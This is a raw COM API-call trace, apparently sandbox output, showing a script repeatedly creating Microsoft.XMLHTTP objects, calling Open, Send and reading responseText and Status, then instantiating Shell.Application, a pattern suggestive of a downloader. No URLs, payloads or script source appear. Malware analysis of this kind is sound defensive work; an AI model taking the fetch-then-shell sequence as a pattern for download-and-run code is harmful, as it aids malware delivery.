	[0329.617] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0329.620] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0329.620] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0329.620] SysStringLen (param_1=0x0) returned 0x0
	[0329.620] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0329.620] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0329.620] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bb0) returned 0x0
	[0329.620] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0329.620] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c18) returned 0x0
	[0329.621] ??2@YAPEAX_K@Z () returned 0x62f310
	[0329.621] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c18, pUnkSite=0x62f310) 
	[0329.621] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0329.621] XMLHTTPRequest:IUnknown:Release (This=0x49c5c18) returned 0x0
	[0329.621] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bb0) returned 0x0
	[0329.621] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bb0) returned 0x3
	[0329.621] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0329.621] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bb0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0329.621] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0329.621] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0329.621] SysStringLen (param_1=0x0) returned 0x0
	[0329.621] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0329.622] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0329.622] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0329.622] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0329.622] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7548) returned 0x0
	[0329.622] ??2@YAPEAX_K@Z () returned 0x62f330
	[0329.622] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7548, pUnkSite=0x62f330) 
	[0329.622] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0329.622] XMLHTTPRequest:IUnknown:Release (This=0x49c7548) returned 0x0
	[0329.622] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0329.622] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0329.622] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0329.622] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0329.622] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0329.623] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0329.623] SysStringLen (param_1=0x0) returned 0x0
	[0329.623] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0329.623] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0329.623] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0329.623] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0329.623] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c18) returned 0x0
	[0329.623] ??2@YAPEAX_K@Z () returned 0x62f310
	[0329.623] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c18, pUnkSite=0x62f310) 
	[0329.623] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0329.623] XMLHTTPRequest:IUnknown:Release (This=0x49c5c18) returned 0x0
	[0329.623] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0329.623] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0329.623] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0329.624] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0329.624] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0329.624] longjmp () 
	[0329.624] longjmp () 
	[0329.624] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0329.624] SysStringLen (param_1=0x0) returned 0x0
	[0329.624] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0329.624] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0329.624] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bb0) returned 0x0
	[0329.624] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0329.624] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7548) returned 0x0
	[0329.624] ??2@YAPEAX_K@Z () returned 0x62f330
	[0329.625] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7548, pUnkSite=0x62f330) 
	[0329.625] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0329.625] XMLHTTPRequest:IUnknown:Release (This=0x49c7548) returned 0x0
	[0329.625] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bb0) returned 0x0
	[0329.625] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bb0) returned 0x3
	[0329.625] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0329.625] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bb0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0329.625] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0329.625] longjmp () 
	[0329.625] longjmp () 
	[0329.625] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0329.625] SysStringLen (param_1=0x0) returned 0x0
	[0329.625] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0329.626] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0329.626] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0329.626] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0329.626] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c18) returned 0x0
	[0329.626] ??2@YAPEAX_K@Z () returned 0x62f310
	[0329.626] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c18, pUnkSite=0x62f310) 
	[0329.626] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0329.626] XMLHTTPRequest:IUnknown:Release (This=0x49c5c18) returned 0x0
	[0329.626] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0329.626] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0329.626] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0329.626] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0329.626] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0329.627] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0329.627] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0329.627] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0330.255] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0330.255] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0330.255] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0330.255] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0330.256] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0330.256] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0330.256] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0330.256] SysStringLen (param_1=0x0) returned 0x0
	[0330.256] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0330.256] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
